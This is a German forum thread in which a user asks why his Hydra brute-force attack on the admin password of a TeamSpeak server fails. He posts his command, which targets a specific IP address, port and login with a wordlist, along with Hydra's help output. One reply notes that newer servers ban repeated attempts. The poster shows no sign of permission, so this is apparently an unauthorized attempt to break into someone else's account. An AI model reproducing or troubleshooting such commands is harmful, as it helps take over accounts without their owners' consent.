Ergebnis 1 bis 3 von 3
  1. #1
    Neuling
    Registriert seit
    22.08.2007
    Beiträge
    2

    Standard

    Schönen Guten abend
    ich versuche mit hydra ein passwort von einem admin heraus zu kriegen, aber ich bekomme nie etwas herraus stadtdessen bekomme ich gar nicht angezeit oder das hier

    C\Dokumente und Einstellungen\Tim\Desktop\Hydra>hydra
    Hydra v5.3 [http//www.thc.org] (c) 2006 by van Hauser / THC <vh@thc.org>

    Syntax hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
    [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
    server service [OPT]

    Options
    -R restore a previous aborted/crashed session
    -S connect via SSL
    -s PORT if the service is on a different default port, define it here
    -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
    -p PASS or -P FILE try password PASS, or load several passwords from FILE
    -e ns additional checks, "n" for null password, "s" try login as pass
    -C FILE colon seperated "loginpass" format, instead of -L/-P options
    -M FILE server list for parallel attacks, one entry per line
    -o FILE write found login/password pairs to FILE instead of stdout
    -f exit after the first found login/password pair (per host if -M)
    -t TASKS run TASKS number of connects in parallel (default 16)
    -w TIME defines the max wait time in seconds for responses (default 30)
    -v / -V verbose mode / show login+pass combination for each attempt
    server the target server (use either this OR the -M option)
    service the service to crack. Supported protocols telnet ftp pop3[-ntlm]
    imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
    cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
    rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
    teamspeak sip vmauthd
    OPT some service modules need special input (see README!)

    Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
    Hydra is a tool to guess/crack valid login/password pairs - use allowed only
    for legal purposes! If used commercially, tool name, version and web address
    must be mentioned in the report. Find the newest version at http//www.thc.org

    C\Dokumente und Einstellungen\Tim\Desktop\Hydra>hydra -l admin Res1 -P "C\Doku
    mente und Einstellungen\Tim\Desktop\Hydra\word.lst" -s 1988 -v 89.163.147.60 tea
    mspeak
    Hydra v5.3 [http//www.thc.org] (c) 2006 by van Hauser / THC <vh@thc.org>

    Syntax hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
    [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
    server service [OPT]

    Options
    -R restore a previous aborted/crashed session
    -S connect via SSL
    -s PORT if the service is on a different default port, define it here
    -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
    -p PASS or -P FILE try password PASS, or load several passwords from FILE
    -e ns additional checks, "n" for null password, "s" try login as pass
    -C FILE colon seperated "loginpass" format, instead of -L/-P options
    -M FILE server list for parallel attacks, one entry per line
    -o FILE write found login/password pairs to FILE instead of stdout
    -f exit after the first found login/password pair (per host if -M)
    -t TASKS run TASKS number of connects in parallel (default 16)
    -w TIME defines the max wait time in seconds for responses (default 30)
    -v / -V verbose mode / show login+pass combination for each attempt
    server the target server (use either this OR the -M option)
    service the service to crack. Supported protocols telnet ftp pop3[-ntlm]
    imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
    cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
    rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
    teamspeak sip vmauthd
    OPT some service modules need special input (see README!)

    Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
    Hydra is a tool to guess/crack valid login/password pairs - use allowed only
    for legal purposes! If used commercially, tool name, version and web address
    must be mentioned in the report. Find the newest version at http//www.thc.org

    das ist einer meiner vielen versuche weiß jemand wo ran das liegen kann habe mir schon alle tut´s angeguckt werde aber net schlauer

    Added after 1 minutes:

    ach und vielen dank schonmal im vorraus für eure antworten

  2. #2
    W32.Klez
    Registriert seit
    03.06.2007
    Beiträge
    404

    Standard

    bei den neuen ts-servern geht hydra nicht mehr. nach ein paar versuchen ist man auf dem server gebannt.

    mfg
    abcdef
    Willst du den Charakter eines Menschen erkennen, so gib ihm Macht.



  3. #3
    Neuling
    Registriert seit
    22.08.2007
    Beiträge
    2

    Standard

    heißt das jez wo ich es versucht habe, dass ist ein neuer teamspeak?

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •